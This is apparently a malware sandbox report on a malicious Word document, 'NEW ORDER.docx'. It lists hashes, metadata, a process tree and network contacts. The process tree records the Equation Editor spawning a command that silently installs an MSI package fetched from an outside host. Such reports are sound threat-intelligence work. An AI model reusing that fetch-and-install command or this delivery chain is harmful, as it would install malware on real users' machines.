File name: | NEW ORDER.docx |
Full analysis: | https://app.any.run/tasks/d892d0e4-3a18-49e4-8e48-ce8edba1b7e8 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 10:48:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 0CDF66E66C2F18FDCEC511C1BDF41252 |
SHA1: | D9E948393C873737477612C80988CE521DAE1EC5 |
SHA256: | 84CC492357968CCE6C5692D2D05B7EF0DAB10A53E8201FF8F652BDCC47C7EEB0 |
SSDEEP: | 3072:a7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKpHE:a7lCAdFkYhDFBxvqyRmTMSFmfSz |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0x2ea8411c |
ZipCompressedSize: | 351 |
ZipUncompressedSize: | 1364 |
ZipFileName: | [Content_Types].xml |
Template: | template.dotx |
---|---|
TotalEditTime: | - |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 1 |
Paragraphs: | 1 |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | - |
Company: | - |
LinksUpToDate: | No |
CharactersWithSpaces: | 1 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 15 |
Keywords: | - |
LastModifiedBy: | Richard |
RevisionNumber: | 2 |
CreateDate: | 2018:11:06 07:34:00Z |
ModifyDate: | 2018:11:06 07:34:00Z |
Title: | - |
---|---|
Subject: | - |
Creator: | Windows User |
Description: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3568 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\NEW ORDER.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3284 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2340 | cmd.exe & /C CD C: & msiexec.exe /i https://a.doko.moe/mhyqwy.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1619 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2596 | msiexec.exe /i https://a.doko.moe/mhyqwy.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3132 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3076 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR32B3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{333D0C73-56CC-4FD4-A6D8-D12A48F85650} | — | |
MD5:— | SHA256:— | |||
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{0F93D533-5919-47F1-889C-1E2D01FF3409} | — | |
MD5:— | SHA256:— | |||
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44DB00D2.jpeg | — | |
MD5:— | SHA256:— | |||
3568 | WINWORD.EXE | C:\Users\admin\~$W ORDER.docx | pgc | |
MD5:43A82A21610F8F89731FD15A316D8279 | SHA256:ACBE8EA4C14867109700FAEB93232772C7DD7D9598068E94E801A4594330D8F4 | |||
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | |
MD5:370DA206497600CA81003C687DB73713 | SHA256:AA92481A43E8B707C5D7CCABC554281A7BD4940A85AFFFA1B5B71CD7A909BB8F | |||
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{E4BBA9CA-981E-4E16-91C0-ECED2A50D48B}.FSD | binary | |
MD5:32AC9E4B1EFB971B548B85A612F1A035 | SHA256:8D69181F48E915D3141B9AF34799677798DBDE7E734379799957D38AC76BC9D7 | |||
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF | binary | |
MD5:DD8EAD52DCCA697D84523C74E01FD7F0 | SHA256:98CCBBDA88B8DE279487D8B56DD44956FD16075C9D09574F4ED3F18AF26FC2B3 | |||
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{E3550006-2EEB-46A2-B6E5-A41FDB3F83AC}.FSD | binary | |
MD5:4DC475D0667026D58CE8B8CD9640087B | SHA256:1747A80502D845AC394C14247316E2C795ECD1539526A809585F461D68D69B07 | |||
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF | binary | |
MD5:E7F40C22E53BC53E0C3571625F398BB8 | SHA256:621034960E40B2288F274C8F5653DA61B95E5450AF36419BEE38E063A4A2A70D |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3568 | WINWORD.EXE | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
964 | svchost.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
3132 | msiexec.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
Domain | IP | Reputation |
---|---|---|
a.doko.moe |
| unknown |